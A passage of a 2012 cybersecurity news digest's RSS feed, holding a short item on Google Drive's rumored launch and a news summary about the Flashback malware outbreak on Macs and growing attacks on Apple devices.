<p>Drive, the name of Google&#8217;s data-syncing cloud storage service that&#8217;s rumored to launch sometime next week, will likely offer many of the features of popular storage apps such as Dropbox and Box, including 5GB of free storage with upgrades of up to 100GB of storage for users willing to pay for service.</p>
</div>
</div>
</div>
<div>
<div>Tags: </div>
<div>
<div><a href="http://news.hitb.org/tags/google">Google</a></div>
<div><a href="http://news.hitb.org/tags/technology">Technology</a></div>
<div><a href="http://news.hitb.org/tags/industry-news">Industry News</a></div>
</div>
</div>
</div>
</li>
<li><a href="http://feeds.ziffdavisenterprise.com/~r/RSS/eweeksecurity/~3/I0bmNh5riNM/" rel="external">Macs, iPhones, iPads Are Now Bigger Targets for Malware, Attackers</a>
<div>The recent Flashback malware attack, which at its height infected more than 600,000 Macs&amp; or more than 1 percent of all systems in use worldwide&amp; not only was the largest such incident involving Apple systems, but also the latest in a string of such attacks. The Flashback exploit&amp; and the number of Macs involved&amp; shook the theory that Apple systems are essentially invulnerable to Trojans, viruses and other malware, and also illustrated the companys inexperience in handling such security situations and dealing with the security community. And it also highlighted what security researchers have been saying for a while: that as Apple devices&amp; not only Macs, but also iPhones and iPads&amp; continue to grow in popularity among consumers and businesses alike, so will the interest from scammers. Costin Raiu, a security expert with Kaspersky Lab, wrote in an April 9 post on the companys SecureList blog that attacks on Apple systems will only continue: “At the beginning of 2012, we predicted an increase in the number of attacks on Mac OS X which take advantage of zero-day or unpatched vulnerabilities. This is a normal development, which happens on any other platform with enough market share to guarantee a return on investment for virus writers, so Mac OS X fans shouldnt be disappointed because of this. During the next few months, we are probably going to see more attacks of this kind, which focus on exploiting two main things: outdated software and the users lack of awareness.” Here are some of the malware issues that have targeted Apple during the past 18 months.   &#8211;  &#8230;</p>
<p><a href="http://ads.pheedo.com/click.phdo?s=2a4bf69aecf17449dc15ff2df47e7124&amp;p=1"><img alt="" border="0" src="http://ads.pheedo.com/img.phdo?s=2a4bf69aecf17449dc15ff2df47e7124&amp;p=1" /></a><br />
<img alt="" height="0" width="0" border="0" src="http://tags.bluekai.com/site/5148" /><img alt="" height="0" width="0" border="0" src="http://insight.adsrvr.org/track/evnt/?ct=0:8pyu3gz&amp;adv=wouzn4v&amp;fmt=3" /></p>
<p><a href="http://feedads.g.doubleclick.net/~at/hvaZBnnzFc6TIK2t66aZfFHm39s/0/da"><img src="http://feedads.g.doubleclick.net/~at/hvaZBnnzFc6TIK2t66aZfFHm39s/0/di" border="0" /></a><br />
<a href="http://feedads.g.doubleclick.net/~at/hvaZBnnzFc6TIK2t66aZfFHm39s/1/da"><img src="http://feedads.g.doubleclick.net/~at/hvaZBnnzFc6TIK2t66aZfFHm39s/1/di" border="0" /></a></p>
<div>
<a href="http://feeds.ziffdavisenterprise.com/~ff/RSS/eweeksecurity?a=I0bmNh5riNM:KlM-sKsq-Wo:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/RSS/eweeksecurity?d=yIl2AUoC8zA" border="0" /></a> <a href="http://feeds.ziffdavisenterprise.com/~ff/RSS/eweeksecurity?a=I0bmNh5riNM:KlM-sKsq-Wo:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/RSS/eweeksecurity?i=I0bmNh5riNM:KlM-sKsq-Wo:V_sGLiPBpWU" border="0" /></a> <a href="http://feeds.ziffdavisenterprise.com/~ff/RSS/eweeksecurity?a=I0bmNh5riNM:KlM-sKsq-Wo:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/RSS/eweeksecurity?d=7Q72WNTAKBA" border="0" /></a> <a href="http://feeds.ziffdavisenterprise.com/~ff/RSS/eweeksecurity?a=I0bmNh5riNM:KlM-sKsq-Wo:dnMXMwOfBR0"><img src="http://feeds.feedburner.com/~ff/RSS/eweeksecurity?d=dnMXMwOfBR0" border="0" /></a>
</div>
<p><img src="http://feeds.feedburner.com/~r/RSS/eweeksecurity/~4/I0bmNh5riNM" height="1" width="1" /></div>
</li>
</ul>
<p class="scrd_credit">Digest powered by <a href="http://www.rssdigestpro.com">RSS Digest</a></p>
]]></content:encoded>
			<wfw:commentRss>http://itdefensesolutions.com/2012/04/cyber-security-news-april-22-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

